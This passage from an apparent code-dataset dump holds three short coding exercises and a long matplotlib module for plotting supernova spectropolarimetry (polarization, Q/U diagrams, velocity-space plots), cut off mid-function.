\n return [\"END\", None]\n\n\n################################################################################\n\n# map of state functions\nstate_funs = {\"START\":state_start}\n\n# map of check fuctions\ncheck_funs = {\"START\":check_start}\n\n\n","repo_name":"chingyuchen/FBBikeBot","sub_path":"favsfuns.py","file_name":"favsfuns.py","file_ext":"py","file_size_in_byte":2079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"22150999474","text":"# 给定一个只包括 '(',')','{','}','[',']' 的字符串,判断字符串是否有效。\n\n# 有效字符串需满足:\n\n# 左括号必须用相同类型的右括号闭合。\n# 左括号必须以正确的顺序闭合。\n# 注意空字符串可被认为是有效字符串。\n\n# 来源:力扣(LeetCode)\n# 链接:https://leetcode-cn.com/problems/valid-parentheses\n# 著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\n\nclass Solution:\n def isValid(self, s: str) -> bool:\n n = len(s)\n if n==0 or n%2==1:\n return False\n tmp = []\n dictT = dict([(\")\",\"(\"),(\"]\",\"[\"),(\"}\",\"{\")])\n for char in s:\n if tmp:\n if char in dictT and dictT[char] == tmp[-1]:\n tmp.pop()\n continue\n tmp.append(char)\n return False if len(tmp)>0 else True\n","repo_name":"songc/LeetCode-Pyhton","sub_path":"leetcode20.py","file_name":"leetcode20.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"3824510944","text":"def hanoi(n, start, to, mid, answer): # 시작, 도착, 경유\n if n == 1:\n return answer.append([start, to])\n\n # 가장 큰 원반을 제외한 나머지 n - 1 개의 원반을 도착 기둥 (여기서는 경유지) 를 거쳐 경유 기둥 (여기서는 도착지) 로 이동\n hanoi(n - 1, start, mid, to, answer)\n\n # n - 1 개의 원반 이동이 끝났다면 마지막 하나 남아있는 원반을 직접 도착지로 이동\n answer.append([start, to])\n\n # 앞선 재귀의 결과로 경유지에 있는 n - 1 개의 원반을 시작 기둥을 거쳐 도착지로 이동\n hanoi(n - 1, mid, to, start, answer)\n\n# 하노이의 탑의 중요 전제 조건은, 가장 큰 원반을 제외한 나머지 n - 1 개의 원반을\n# 먼저 경유 기둥으로 옮기고, 가장 큰 원반을 목적 기둥에 옮길 수 있다는 것.\ndef solution(n):\n answer = []\n hanoi(n, 1, 3, 2, answer)\n\n return answer\n\n\nprint(solution(2))","repo_name":"juni8453/python_practice","sub_path":" problem_solving_strategy/복습/recursion/하노이의_탑_복습.py","file_name":"하노이의_탑_복습.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"3370186123","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Apr 23 17:42:06 2021\r\n\r\n@author: sabri\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib.collections import LineCollection\r\nfrom pylab import *\r\nfrom scipy import odr \r\nfrom scipy.optimize import curve_fit\r\nfrom sklearn.linear_model import LinearRegression\r\nimport imageio\r\nfrom get_data import * \r\nfrom scipy.stats import linregress\r\n#from mpltools import color \r\n\r\ndef plot_p_single(line_list, label_list, color_list, unbinned_t, bin_data_t, bin_size, flux_factor, title, save = \"none\", shift_list = \"none\"):\r\n \"\"\"Creates a single panel plot of polarization and relative flux for one epoch. \r\n Line, label and color lists are to specify features in spectra and may be given empty list []. \r\n wl and flux are unbinned data list collected from get_data function.\r\n The binned lists can be gathered from get_binned. \r\n Flux factor is a number to multiply the flux by so it is scaled to the polarization for presentation. \r\n bin_size is a number provided for labeling. If a title is provided the figure will be saved as that. \r\n If a shift_list (a list of wavelengths representing locations of shifted line features) is provided it will be plotted too.\r\n Title must be provided and if save = on plot is saved under title in Single_epoch_tot_p folder.\r\n \"\"\"\r\n \r\n #calculate total polarization\r\n p = bin_data_t['p']\r\n f = unbinned_t['flx']*flux_factor #scale flux \r\n pmax = p.max()#max polarization value (for labels later)\r\n \r\n fig, ax = subplots(1, sharex = True, sharey = True, figsize = (14, 7))\r\n fig.suptitle(title, y = .95, fontsize = 22)\r\n #ax.axvspan(6462, 7102, color = 'lightgrey', label = '+/-15000km/s centered on 6800', alpha = .6) #alpha adjusts the transparency\r\n ax.step(bin_data_t['wave'], p, 'k', label = 'Polarization (Bin Size ' + str(bin_size) +\"Å)\")\r\n ax.fill_between(unbinned_t['wave'], f, color = 'powderblue', label = \"Relative Flux\") \r\n ax.tick_params(axis='both', which='major', labelsize=14)\r\n ax.set_ylim([0, 5.2]); ax.set_xlim([4000, 7900])\r\n ax.legend(loc=\"upper left\", fontsize = 14); \r\n ax.set_xlabel(\"Wavelength(Å)\", fontsize = 16); ax.set_ylabel(\"Percent Total Polarization\", fontsize = 16)\r\n \r\n #ISP estimate areas\r\n #ax.axhline(y=.3, xmin=.335, xmax=.385, c= 'fuchsia')\r\n #ax.axhline(y=.1, xmin=.58, xmax=.62, c= 'fuchsia')\r\n \r\n for xc, c in zip(line_list, color_list):\r\n ax.axvline(x=xc, c=c) #plot veritcle line at location xc in linelist with color c in colorlist\r\n \r\n label_loc = 2 #initial label position \r\n for xc, lab in zip(line_list, label_list):\r\n ax.text(xc+10, label_loc, lab, fontsize = 14, fontstyle = 'oblique', rotation = 'vertical') #add label at verticle position pmax next to line at xc, with label lab from label list \r\n label_loc = label_loc + .2 #change label position each time so they don't overlap \r\n \r\n #plot shifted lines in same color as rest lines if list is provided\r\n if shift_list != \"none\":\r\n for xc, c in zip(shift_list, color_list):\r\n ax.axvline(x=xc, c=c, linestyle = ':', linewidth = 3)\r\n if save != \"none\":\r\n fig.savefig(\"Single_epoch_tot_P/\"+str(title))\r\n return(ax)\r\n\r\n\r\ndef plot_pannels(unbinned_t, bin_data_t, unbin_flux_factor, bin_flux_factor, adjust_pa = 'on', title = 'none'):\r\n \r\n \"\"\"Creates the classic five plots (total polarization,polarized flux, %U, %Q, PA vs wavelength) with the flux \r\n plotted in a shaded region of each pannel. \r\n \r\n Takes in two astropy tables for unbinned and binned data\r\n unbinned_file must contain a column call 'flx' (so make sure to pass that to get_fits if that's used)\r\n \r\n Flux factors are what to multiply the unbinned and binned flux by to be on the same scale as the polarization. \r\n adjust_pa is automatically set to add 180 for values less than 0, if you don't want this adjust_pa = 'off'.\r\n \r\n Provide a title to save plot otherwise the plot will be titled 'none' and will not be saved. \r\n \"\"\"\r\n \r\n import numpy as np\r\n import matplotlib.pyplot as plt\r\n \r\n Q = np.array(bin_data_t['q'])*100 #convert fraction to percent \r\n U = np.array(bin_data_t['u'])*100\r\n \r\n F = np.array(unbinned_t['flx'])*unbin_flux_factor #Adjust scale of relative flux to magnitude of polarizations\r\n \r\n P_Flux = bin_data_t['p']*bin_data_t['flx']*bin_flux_factor\r\n \r\n PA = np.degrees(.5*np.arctan2(U, Q)) #calculate PA\r\n \r\n if adjust_pa != 'on': #decide to add 180 to PA or not\r\n pass\r\n else:\r\n for i in range(len(PA)):\r\n if PA[i] < 0:\r\n PA[i] = PA[i]+180\r\n else:\r\n PA[i] = PA[i]+0\r\n\r\n PA_ave = [] #creat list for plotting line of average PA \r\n for i in range(len(PA)): PA_ave.append(np.nanmean(PA)) #calculate average PA\r\n \r\n fig, (ax0, ax1, ax2, ax3, ax4) = plt.subplots(5, sharex = True, figsize=(20,14))\r\n fig.suptitle(title, fontsize=24, y=.95)\r\n ax0.step(bin_data_t['wave'], bin_data_t['p'], 'r'); ax0.fill_between(unbinned_t['wave'], F, color = 'skyblue', label = 'Relative Flux'); ax0.set_ylabel(\"%Polarization\", fontsize = 'medium'); ax0.legend(fontsize='medium')\r\n ax1.step(bin_data_t['wave'], P_Flux, 'r'); ax1.fill_between(unbinned_t['wave'], F, color = 'skyblue'); ax1.set_ylabel(\"Polarized Flux\", fontsize = 'medium')\r\n ax2.step(bin_data_t['wave'], Q, 'r'); ax2.fill_between(unbinned_t['wave'], F, color = 'skyblue'); ax2.set_ylabel(\"% Q\", fontsize = 'medium') \r\n ax3.step(bin_data_t['wave'], U, 'r'); ax3.fill_between(unbinned_t['wave'], F, color = 'skyblue' ); ax3.set_ylabel(\"% U\", fontsize = 'medium') \r\n ax4.step(bin_data_t['wave'], PA, 'r'); ax4.plot(bin_data_t['wave'], PA_ave, 'k', label = 'Average PA: '+ str(round(np.nanmean(PA))) + u'\\xb0', linewidth = 3);ax4.set_ylabel(\"Position Angle\", fontsize = 'medium'); ax4.legend(fontsize = \"medium\"); ax4.set_xlabel(\"Wavelength(Å)\")\r\n \r\n plt.subplots_adjust(wspace=0, hspace=0)\r\n #if title != 'none':\r\n #fig.savefig(\"Pannel_Plots/\"+ title)\r\n #print(\"Plot has been saved under filename \" + str(title) + \" in the Pannel_Plots directory\")\r\n \r\n return (print(\"provide title to save plot\"))\r\n\r\ndef best_fit(Q, U, Qsig, Usig):\r\n from scipy import odr \r\n from scipy.optimize import curve_fit\r\n from sklearn.linear_model import LinearRegression\r\n \r\n \"\"\"Creates an error-weighted best fit line for Q/U plots given 4 lists of percent. \r\n \"\"\"\r\n \r\n def func(b, x): \r\n # Linear function y = m*x + b\r\n # b is a vector of the parameters.\r\n # x is an array of the current x values.\r\n return b[0] * x + b[1]\r\n\r\n #model object\r\n lin_model = odr.Model(func)\r\n\r\n #creat real data object\r\n data = odr.RealData(Q, U, sx=Qsig, sy=Usig)\r\n\r\n # Set up ODR with the model and data.\r\n odr = odr.ODR(data, lin_model, beta0=[0., 1.])\r\n\r\n # Run the regression.\r\n out = odr.run()\r\n\r\n #fit peramaters\r\n popt = out.beta\r\n perr = out.sd_beta\r\n print(\"fit parameter 1-sigma error\")\r\n print(\"Slope = \"+ str(popt[0])+\" +- \"+str(perr[0]))\r\n print(\"Intercept = \" + str(popt[1]) + \" +- \" + str(perr[1]))\r\n print(\"———————————–\")\r\n x_fit = np.linspace(min(Q), max(Q))\r\n fit = func(popt, x_fit)\r\n \r\n #links for weighted fit:\r\n #https://micropore.wordpress.com/2017/02/07/python-fit-with-error-on-both-axis/\r\n #https://docs.scipy.org/doc/scipy/reference/odr.html\r\n \r\n return (x_fit, fit)\r\n\r\ndef plot_QU(binned_data, title, size = 3.2, save = 'none', epoch_labels = 'none'):\r\n \r\n \"\"\"Creates a Q vs U plot with points color coded by wavelength and a line of best fit \r\n that includes errors when epoch_labels = 'none' (most common use and is set by defualt). \r\n \r\n Takes in an astropy Table with 'wave', 'q', 'u', 'qerr', 'uerr' columns. \r\n size is auto set to .05 otherwise change for tighter fit. \r\n Title must be provided and if save = on the plot is saved under that in a QU_Plots directory. \r\n A best fit including weighed errors is calculated from lists provided using the function best_fit.\r\n \r\n Optionally one can plot Q/U values without specifying wavelength by color if epoch_labels is set equal to something. \r\n For example to plot the single average Q/U point for three epochs on the same plot \r\n epoch_labels = ['epoch_1', 'epoch_2', 'epoch_3'] and each point will be labeled accordingly. \r\n \"\"\"\r\n \r\n wl = binned_data['wave']\r\n #convert fraction to percentage and ignore nan values\r\n Q = [x for x in binned_data['q'] if np.isnan(x) == False] \r\n U = [x for x in binned_data['u'] if np.isnan(x) == False]\r\n Qsig = [x for x in binned_data['qerr'] if np.isnan(x) == False]\r\n Usig = [x for x in binned_data['uerr'] if np.isnan(x) == False]\r\n \r\n wl, Q = zip(*zip(wl, Q)) #makes sure wavelength and other lists are the same length for plotting\r\n #by pairing values up in each then dropping unpaired values \r\n \r\n bfit = best_fit(Q, U, Qsig, Usig)\r\n x_fit = bfit[0]\r\n fit = bfit[1]\r\n \r\n #calculate average error\r\n Qave_err = np.nanmean(Qsig)\r\n Uave_err = np.nanmean(Usig)\r\n\r\n #plot\r\n fig, ax = plt.subplots(1, figsize=(10,10))\r\n rcParams[\"font.size\"]= 20\r\n fig.suptitle(title, fontsize=20, y=.85, x=.44) \r\n ax.axhline(0, color = 'k', linewidth = 1, zorder = 1)\r\n ax.axvline(0, color = 'k', linewidth=1, zorder = 2)\r\n ax.plot(Q, U, c = 'lightgrey', linewidth = 1, zorder = 3 )\r\n ax.axis('square'); ax.set_xlim([-float(size), float(size)]); ax.set_ylim([-float(size), float(size)]) #comment out to see zoomed in \r\n ax.set_xlabel(\"% Q Polarization\", fontsize=18); ax.set_ylabel(\"% U Polarization\", fontsize=18)\r\n\r\n \r\n if epoch_labels == 'none':\r\n #if plotting a a single epoch of data plot colors accoring to wavelength\r\n im = ax.scatter(Q,U, marker = 'o', c=wl, s=20, zorder = 4) #c=color set to a different color for each point in wavelength array, s=size \r\n fig.colorbar(im).ax.set_ylabel('Wavelength(Å)', fontsize=20) #shows colorbar and labels it\r\n ax.plot(x_fit, fit, \"r\", lw=2, label=\"Best Fit\", zorder = 5) #best fit line\r\n ax.errorbar((-float(size) + .005), (float(size) - .0058), xerr = Qave_err, yerr = Uave_err) #add error bar example in location based on grid size \r\n #ax.text((-float(size)+ .008), (float(size) - .0055), \"Average Error\", fontsize = 13)\r\n else:\r\n #if ploting average data points (wavelength doesn't matter) plot all points as same color \r\n im = ax.scatter(Q,U, marker = 'o', s=20, zorder = 5)\r\n ax.errorbar(Q, U, yerr=Usig, xerr=Qsig, ecolor=\"grey\", hold=True, fmt=\"none\", zorder = 4 ) #comment out to see points by wavelength\r\n for i, txt in enumerate(epoch_labels):\r\n ax.annotate(txt, xy = (Q[i]+0.0005, U[i]), fontsize = 14) #label each data point according to epoch_labels provided \r\n \r\n ax.legend(loc=\"lower left\",fontsize='x-small')\r\n if save != 'none':\r\n fig.savefig(\"QU_Plots/\"+ title)\r\n print(\"figure saved in QU_Plots directory under\" + str(title))\r\n else:\r\n print(\"set save = on to save figure\")\r\n fig.show()\r\n \r\n #return (print(\"Q vs U plot has been saved under filename \" + str(title) + \" in the QU_Plots directory\"))\r\n return() \r\n \r\ndef plot_line_velspace(data_t, rest_wave, velocity, flx_factor, epoch, save = \"off\", plot = \"off\"):\r\n \"\"\"Creates a velocity space plot centered on desired line. \r\n Takes in a data table (from Bin_data or get_txtFITS), the wavelength of the line to center plot on, \r\n the velocity range to go out to on either end, the flux factor so flux fits to scale with polarization, \r\n an epoch for the plot title (no spaces) and option to save if save = on to folder VelSpace_plots/epoch+rest_wave\r\n (save is automatically off so plot will not save)\"\"\"\r\n\r\n title = str(epoch) + \" Velocity Region Centered on \" + str(rest_wave)\r\n vel=[] #creat list for velocity values\r\n wave_range = get_obswave(rest_wave, velocity) #calculate wavelengths on either side of rest that pertain to velocity region desired\r\n line_data = get_lines(data_t, wave_range[1], wave_range[0]) #get lines from data table in between wavelengths in velocity range\r\n #print(line_data)\r\n for i in line_data['wave']:\r\n vel.append(get_velocity(rest_wave, i)) #calculate velocities for each wavelength in selected data region\r\n \r\n if plot != \"off\":\r\n #plot total polarization and flux in velocity range\r\n plt.figure(figsize= (10,7)); plt.title(title, fontsize = '20')\r\n plt.plot(vel, line_data['p'], color = 'k', label = \"Total Polarization\")\r\n plt.fill_between(vel, line_data['flx']*flx_factor, color = 'skyblue', label = 'Relative Flux')\r\n plt.ylabel('Percent Total Polarization', fontsize = '20'); plt.xlabel('Velocity (km/s)',fontsize = '20'); plt.legend(fontsize = '14')\r\n \r\n if save != \"off\":\r\n #plt.savefig(\"VelSpace_plots/\"+str(epoch)+str(rest_wave)) #option to save plot\r\n plt.savefig(\"VelSpace_plots/\"+str(epoch)+str(rest_wave))\r\n \r\n return(line_data)\r\n\r\ndef plot_all_data(unbin_epoch_tables_list, epoch_tables_list, flux_adjust_list, pflux_adjust_list, epoch_labels_list, title = \"none\", xmin = \"none\", xmax = \"none\",):\r\n #find xmin, xmax from first epoch values if not otherwise provided \r\n if xmin == 'none':\r\n xmin = np.min(epoch_tables_list[0]['wave'])\r\n if xmax == 'none':\r\n xmax = np.nanmax(epoch_tables_list[0]['wave'])\r\n \r\n #plot polarization and flux for each epoch stacked \r\n fig, (ax0, ax1, ax2, ax3, ax4, ax5) = plt.subplots(6, sharex = True, figsize = (20, 24))\r\n \r\n if title != 'none':\r\n fig.set_title(title, fontsize = 16)\r\n #fig.set_xlim([xmin, xmax]) \r\n ax0.set_ylabel('Relative Flux'); ax1.set_ylabel('% Polarization'); ax2.set_ylabel('polarized flux'); ax3.set_ylabel('% Q'); ax4.set_ylabel('% U'); ax5.set_ylabel('PA')\r\n ax5.set_xlabel('Wavelength (Å)') \r\n\r\n count = 0\r\n #plot flux with proper adjustment to be on same scale\r\n for epoch in unbin_epoch_tables_list: \r\n color = iter(cm.rainbow(np.linspace(0, 1, count))); \r\n ax0.plot(epoch['wave'], epoch['flx']*flux_adjust_list[count], label = epoch_labels_list[count], lw = 1)\r\n ax0.legend()\r\n count = count + 1\r\n \r\n #plot polarization data \r\n count = 0\r\n for epoch in epoch_tables_list:\r\n ax1.step(epoch['wave'], epoch['p'])\r\n ax2.step(epoch['wave'], epoch['p']*epoch['flx']*pflux_adjust_list[count]); count = count+1\r\n ax3.step(epoch['wave'], epoch['q']) #already in %p \r\n ax4.step(epoch['wave'], epoch['u'])\r\n ax5.step(epoch['wave'], PA(epoch['q'], epoch['u'])) #PA function found in get_data.py\r\n \r\n return(fig)\r\n\r\ndef plot_all_flx(unbin_epoch_tables_list, flx_adjust_list, epoch_names, num_epochs):\r\n \r\n plt.figure(figsize=(15, 12))\r\n plt.subplots_adjust(hspace=0)\r\n plt.rc('axes', labelsize= 12) # fontsize of the x and y labels\r\n plt.rc('xtick', labelsize= 12) # fontsize of the tick labels\r\n plt.rc('ytick', labelsize= 12) # fontsize of the tick labels\r\n plt.rc('legend', fontsize= 12) # legend fontsize\r\n #plt.xlabel('Wavelength (Å)'), plt.ylabel('Relative Flux')\r\n # loop through the length of list of unbinned epoch data tables and keep track of index\r\n for n, epoch in enumerate(unbin_epoch_tables_list):\r\n # add a new subplot iteratively\r\n ax = plt.subplot(num_epochs, 1, n+1)#stack them\r\n ax.set_xlim(4000, 8000); ax.set_xticks([])#share same x-axis scale but don't show for each of them \r\n ax.set_xlabel('Wavelength (Å)', fontsize = 12)\r\n ax.plot(epoch['wave'], epoch['flx']*flx_adjust_list[n], c = 'k', label = str(epoch_names[n]) ) #label each one by epoch\r\n ax.set_yticks([1,3,5])\r\n #ax.axvline(4924, c = 'b')\r\n plt.legend() \r\n if n == 0: \r\n ax.annotate('He I', (5600, 5.85))\r\n ax.annotate('Fe II', (4750, 4.25))\r\n ax.annotate('$\\\\bigoplus$', (6850, 4.25))\r\n ax.annotate('$\\\\bigoplus$', (7600, 2))\r\n if n == 5: \r\n ax.annotate('Mg I', (4571, 3.25))\r\n ax.annotate('Fe II (λλλ)', (4900, 3.25))\r\n ax.annotate('O I', (5577, 2.5))\r\n ax.annotate('NaID', (5890, 2.5))\r\n ax.annotate('O I', (6364, 4.5))\r\n if n == len(epoch_names)/2-1: \r\n ax.set_ylabel('Relative Flux', fontsize = 12) \r\n ax.set_xticks(np.arange(4000, 8000, 250))#show only x-axis for last plot\r\n return()\r\n\r\ndef plot_all_epochs(epoch_tables_list, flx_adjust_list, epoch_labels_list, title = \"none\", xmin = \"none\", xmax = \"none\", regions_list = 'none', line_list = 'none', label_list = 'none', color_list='none', polflux = 'off'):\r\n \"\"\"Creates a plot of all epochs total polarization and flux stacked (spaced 5% appart). \r\n Requires list of epoch data tables (outputs of Bin_data), \r\n list of flux adjustment values so they are scaled to polarization levels, \r\n list of epoch labels as strings. \r\n Optional arguments are title, xmin (that epoch labels are located at), xmax and \r\n list of regions of interest (like continuum) where each region is a list of two numbers (the bounds of the region).\r\n ex: regions_list = [[5000, 5500], [7000, 7300]]\r\n There is currently no save option so plots must be save from output.\r\n The function returns the axis so anything can be added to the plot after by:\r\n image = plot_all_epochs(blah, blah....)\r\n image.axvline(x=...)\r\n \"\"\"\r\n \r\n #count number of epochs\r\n num_epochs = 0\r\n for count, item in enumerate(epoch_tables_list):\r\n num_epochs = num_epochs +1\r\n \r\n #find xmin, xmax from first epoch values if not otherwise provided \r\n if xmin == 'none':\r\n xmin = np.min(epoch_tables_list[0]['wave'])\r\n if xmax == 'none':\r\n xmax = np.nanmax(epoch_tables_list[0]['wave'])\r\n \r\n #plot polarization and flux for each epoch stacked \r\n fig, (ax) = plt.subplots(1, sharex = True, figsize = (10, 10))\r\n \r\n if title != 'none':\r\n ax.set_title(title, fontsize = 12)\r\n #ax.set_xlim([xmin, xmax]) \r\n count = 0 #count each epoch to index correct flx adjust and epoch label \r\n fmax_list = [] #creat list to store maximum values to position labels\r\n\r\n if polflux != 'off':\r\n space = (num_epochs-1)*4 #calculate total space needed to plot epochs stacked\r\n ax.set_xlabel(\"Wavelength (Å)\", fontsize = 14); ax.set_ylabel(\"Relative Polarized Flux\", fontsize = 14)\r\n for epoch in epoch_tables_list:\r\n P_Flux = epoch['p']*epoch['flx']*flx_adjust_list[count]\r\n ax.step(epoch['wave'], P_Flux + space)\r\n #ax.annotate(epoch_labels_list[count], xy = (xmin + 50, space +2), fontsize = 14) \r\n count = count +1; space = space - 5\r\n\r\n else:\r\n space = (num_epochs-1)*5 #calculate total space needed to plot epochs 5% appart\r\n ax.set_xlabel(\"Wavelength (Å)\", fontsize = 12); ax.set_ylabel(\"Percent Polarization\", fontsize = 12)\r\n for epoch in epoch_tables_list:\r\n p = ax.step(epoch['wave'], epoch['p'] + space, label = epoch_labels_list[count] + \" (P+\"+str(np.round(space))+\"%)\") #plot polarization of epochs spaced 5% appart \r\n ax.plot(epoch['wave'], epoch['flx']*flx_adjust_list[count] + space, color = 'k', linestyle = ':')#plot flux with adjusted scale and inline with polarization\r\n fmax = np.nanmax(epoch['flx'])*flx_adjust_list[count] + space; fmax_list.append(fmax) #find max value and store\r\n #ax.legend(loc = 'upper right')\r\n ax.annotate(epoch_labels_list[count] + \" \\n (P+\"+str(np.round(space))+\"%)\", xy = (xmin + 50, space+3 ), fontsize = 10, c=p[0].get_c()) #label epoch and polarization factor (color code label to line color)\r\n count = count +1; space = space - 5\r\n\r\n #highlight special regions (if lists of region bounds are provided)\r\n if regions_list != 'none':\r\n count_lists = 0 #index first list in list of lists\r\n\r\n for region in regions_list:\r\n aves = get_aves([epoch], region) #calculate averages for data in region \r\n ave_p = str(np.round(aves['p'][0], 3)); #get average total polarization\r\n print(ave_p)\r\n ave_perr = str(np.round(aves['perr'][0], 4)) #get average total polarization error \r\n ax.axvspan(region[0], region[1], color = 'lightgrey') #highlight region \r\n #ax.annotate(ave_p + \"% \\n \\u00B1\" + ave_perr, xy =(region[0] + 50, space+8 ), fontsize = 9) #lable polarization and error in region where xy = is a really complicated way of locating the label \r\n count_lists = count_lists + 1 #move to next region list index\r\n \r\n #add lines for features of interest \r\n if line_list != 'none':\r\n for xc, c in zip(line_list, color_list):\r\n ax.axvline(x=xc, c=c) #plot veritcle line at location xc in linelist with color c in colorlist\r\n \r\n label_loc = 3.5 #initial label position \r\n for xc, lab in zip(line_list, label_list):\r\n ax.text(xc-30, 28, lab, fontsize = 12, rotation = 'vertical') #add label at verticle position pmax next to line at xc, with label lab from label list \r\n #ax.text(xc+10, fmax_list[0] - .1, lab, fontsize = 14) #rotation = 'vertical') #add label at verticle position pmax next to line at xc, with label lab from label list \r\n #label_loc = label_loc + .2 #change label position each time so they don't overlap \r\n\r\n count = count + 1 #move to next epoch index \r\n space = space - 5 #reduce space so that oldest epic is on bottom of plot\r\n \r\n return(ax) \r\n\r\ndef QU(binned_data, ax = None, bfit = 'none', size = 4.5, color_data = 'wl', epoch_labels = 'none', cmap_choice = 'turbo', bfit_c = 'grey'):\r\n \"\"\"Returns QU plot given a binned_data table. The return object should be added to a figure in order\r\n to do fig.colorbar(QU_return) and fig.suptitle to make it look pretty. Multiple QU plots can be added \r\n as subplots of a figure by: \r\n import matplotlib.pyplot as plt\r\n fig, (ax1, ax2) = plt.subplots(1, 2, figsize = (12, 5))\r\n e1 = QU(epoch1_20, 'E1', ax1)\r\n e2 = QU(epoch2_20, 'E2', ax2)\r\n fig.colorbar(e1).set_label('Wavelength(Å)') \r\n A best fit line can be calculated outside the function and passed to it to exclude points that are in the QU plot. \r\n If bfit is not specified the bestfit in calculated in the function using all the QU points. \"\"\"\r\n \r\n if ax == None:\r\n ax = plt.gca()\r\n \r\n wl = binned_data['wave']\r\n #convert fraction to percentage and ignore nan values\r\n Q = [x for x in binned_data['q'] if np.isnan(x) == False] \r\n U = [x for x in binned_data['u'] if np.isnan(x) == False]\r\n Qsig = [x for x in binned_data['qerr'] if np.isnan(x) == False]\r\n Usig = [x for x in binned_data['uerr'] if np.isnan(x) == False]\r\n \r\n wl, Q = zip(*zip(wl, Q)) #makes sure wavelength and other lists are the same length for plotting\r\n #by pairing values up in each then dropping unpaired values \r\n \r\n if bfit == 'none':\r\n bfit = best_fit(Q, U, Qsig, Usig)\r\n \r\n x_fit = bfit[0]\r\n fit = bfit[1]\r\n \r\n #calculate average error\r\n Qave_err = np.nanmean(Qsig)\r\n Uave_err = np.nanmean(Usig)\r\n print(Qave_err, Uave_err)\r\n if Qave_err < 0.1:\r\n Qave_err = 0.1\r\n if Uave_err < 0.1:\r\n Uave_err = 0.1 \r\n\r\n #plot\r\n ax.axhline(0, color = 'k', linewidth = 1, zorder = 1)\r\n ax.axvline(0, color = 'k', linewidth=1, zorder = 2)\r\n ax.plot(Q, U, c = 'lightgrey', linewidth = 2, zorder = 3 )\r\n ax.axis('square'); ax.set_xlim([-float(size), float(size)]); ax.set_ylim([-float(size), float(size)]) #comment out to see zoomed in \r\n #ax.set_xlabel(\"q(%)\", fontsize = 18); ax.set_ylabel(\"u(%)\", fontsize = 18); ax.yaxis.set_label_coords(-.13, .5)\r\n #ax.tick_params(labelsize=18)\r\n \r\n if epoch_labels == 'none':\r\n #if plotting a a single epoch of data plot colors accoring to wavelength\r\n im = ax.scatter(Q,U, marker = 'o', c=wl, s=20, zorder = 4, cmap = cmap_choice) #c=color set to a different color for each point in wavelength array, s=size \r\n #if another column of data is provided for colorcoding use that (for example 'vel' column from get_vel_column to colorcode in velocity space)\r\n if color_data != 'wl':\r\n im = ax.scatter(Q,U, marker = 'o', c=color_data, s=20, zorder = 4, cmap = cmap_choice) #c=color set to a different color for each point in wavelength array, s=size \r\n #fig.colorbar(im).ax.set_ylabel('Wavelength(Å)', fontsize=12) #shows colorbar and labels it\r\n #ax.plot(x_fit, fit, bfit_c, lw=2, label=\"Best Fit\", zorder = 5) #best fit line\r\n ax.errorbar((-float(size) + .5), (float(size) - .58), xerr = Qave_err, yerr = Uave_err) #add error bar example in location based on grid size \r\n ax.text((-float(size)+ .8), (float(size) - .55), \"Average Error\", fontsize = 10)\r\n #ax.legend(loc=\"lower left\", fontsize='medium')\r\n else:\r\n #if ploting average data points (wavelength doesn't matter) plot all points as same color \r\n im = ax.scatter(Q,U, marker = 'o', s=20, zorder = 5)\r\n ax.errorbar(Q, U, yerr=Usig, xerr=Qsig, ecolor=\"grey\", hold=True, fmt=\"none\", zorder = 4 ) #comment out to see points by wavelength\r\n for i, txt in enumerate(epoch_labels):\r\n ax.annotate(txt, xy = (Q[i]+0.0005, U[i]), fontsize = 14) #label each data point according to epoch_labels provided \r\n \r\n return(im)\r\n\r\ndef plot_QU_spec_comp2(unbindata, bindata, flx_adjust, region_lists, region_names, comp_color = 'whole_region'):\r\n \"\"\"Creates a plot with the flux and polarization spectrum of a single epoch of data as the bottom pannel\r\n and two square plots comparing Q/U data of selected 2 regions in that same epoch above (hence comp2). \r\n Q/U plots are color coded in velocity space with the colorbar dictated by the second region given. \r\n Inputs required are: unbinned data table from get_fits, bindata table from Bin_data, \r\n flx_adjust = a single number for flx adjust to adjust flx spectrum to polarization level for bottom pannel, \r\n region_lists = a list of two lists for the two line regions to compare where in each list the entries are \r\n [blue_limit_wave, rest_wave, red_limit_wave], region_names = a list of region names as strings and the region, \r\n comp_color = a string value (blue or red) that specifies what side of the rest wavelength you want to compare in Q/U space.\r\n If no color is given the default is to compare the whole line region from the blue limit to the red limit\r\n \r\n ***NOTE: whatever region has complete data shoud be the second region listed, \r\n if the second region does not have data spanning the whole region specified the Q/U velocity color scale will be inaccurate. \r\n \"\"\"\r\n \r\n fig = plt.figure()\r\n fig.set_figheight(8)\r\n fig.set_figwidth(10)\r\n\r\n ax1 = plt.subplot2grid(shape=(2,2), loc=(1,0), colspan = 2)\r\n ax2 = plt.subplot2grid(shape=(2,2), loc=(0,0), colspan = 1)\r\n ax3 = plt.subplot2grid(shape=(2,2), loc=(0,1), colspan = 1)\r\n ax_list = [ax2, ax3] #put in list for QU plots loop\r\n \r\n #bottom panel - spectra \r\n ax1.fill_between(unbindata['wave'], unbindata['flx']*flx_adjust, color = 'silver')\r\n ax1.step(bindata['wave'], bindata['p'], c = 'k')\r\n ax1.set_ylim([0, 5.2])\r\n ax1.set_ylabel('Percent Total Polarization')\r\n ax1.set_xlabel('Wavelength (Å)')\r\n \r\n #top sqaures - line region QUs\r\n ax2.annotate(region_names[0], (3, 4))\r\n ax2.set_ylabel(\"%U\")\r\n ax2.set_xlabel(\"%Q\", loc = 'right')\r\n ax2.add_patch(plt.Circle((0, 0), radius = .32, edgecolor='red', facecolor = 'none'))#isp\r\n\r\n ax3.annotate(region_names[1], (3, 4))\r\n ax3.add_patch(plt.Circle((0, 0), radius = .32, edgecolor='red', facecolor = 'none'))#isp\r\n\r\n \r\n for region, ax in zip(region_lists, ax_list):\r\n ax1.axvspan(region[0], region[1], color = 'paleturquoise', alpha = .5)\r\n ax1.axvspan(region[1], region[2], color = 'lightcoral', alpha = .4)\r\n \r\n #get QU data in velocity space for blue region of lines\r\n if comp_color == 'blue':\r\n reg = get_lines(bindata, region[0], region[1])\r\n reg_vel = get_vel_column(reg, region[1])\r\n reg_qu = QU(reg_vel, ax = ax, color_data = reg_vel['vel'], cmap_choice = 